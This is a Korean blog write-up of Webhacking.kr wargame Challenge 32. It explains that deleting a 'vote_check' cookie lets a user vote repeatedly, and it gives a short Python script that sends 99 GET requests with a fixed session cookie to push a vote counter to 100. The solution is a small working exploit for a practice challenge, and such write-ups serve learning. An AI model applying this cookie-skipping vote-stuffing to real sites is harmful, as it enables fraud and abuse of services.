티스토리 뷰

Wargame/Webhacking.kr

Challenge 32

do9dark 2015. 8. 10. 01:18

문제 페이지에 접근하면 아래와 같이 순위를 볼 수 있다.



하단에 보면 Join 버튼을 누르면 자신의 계정이 등록이 된다.



등록 완료!



확인을 누르면 아래와 같이 자신의 계정이 추가된 것을 볼 수 있다.



자신의 계정을 클릭해보면 아래와 같이 숫자가 증가한 것을 볼 수 있다.

100까지 표시가 되어 있는 것으로 봐서 100이 되면 문제를 풀 수 있는 것 같다.



하지만 두번째 클릭을 하면 아래와 같이 no! 라고 표시가 되면서 숫자가 증가되지 않는다.



쿠키 값을 보면 이전과 달리 vote_check=ok 라는 값이 추가된 것을 볼 수 있으며 해당 쿠키를 삭제하면 정상적으로 숫자를 증가할 수 있다.



이와 같은 작업을 반복해주는 것을 스크립트로 작성하면 문제를 풀 수 있다.

GET 방식으로 ?hit=자신의계정 정보를 같이 넘겨주면 된다.


#!/usr/bin/python
# -*- coding: utf-8 -*-
# do9dark
 
import httplib
 
for i in range(0,99):
    url = "/challenge/codeing/code5.html?hit=do9dark"
    cookie = {'Cookie':'PHPSESSID=pobhqrjncs9prc45ouq0ifvvp4'}
 
    conn = httplib.HTTPConnection('webhacking.kr')
    conn.request('GET',url,'',cookie)
    data = conn.getresponse().read()
    conn.close()
 
    print data
cs


'Wargame > Webhacking.kr' 카테고리의 다른 글

Challenge 37  (0) 2015.08.12
Challenge 36  (0) 2015.08.12
Challenge 35  (0) 2015.08.12
Challenge 34  (0) 2015.08.12
Challenge 33  (0) 2015.08.10
Challenge 31  (0) 2015.08.09
Challenge 30  (0) 2015.08.09
Challenge 29  (0) 2015.08.07
Challenge 28  (0) 2015.08.07
Challenge 27  (0) 2015.08.07
댓글
«   2024/03   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
링크
공지사항
Total
Today
Yesterday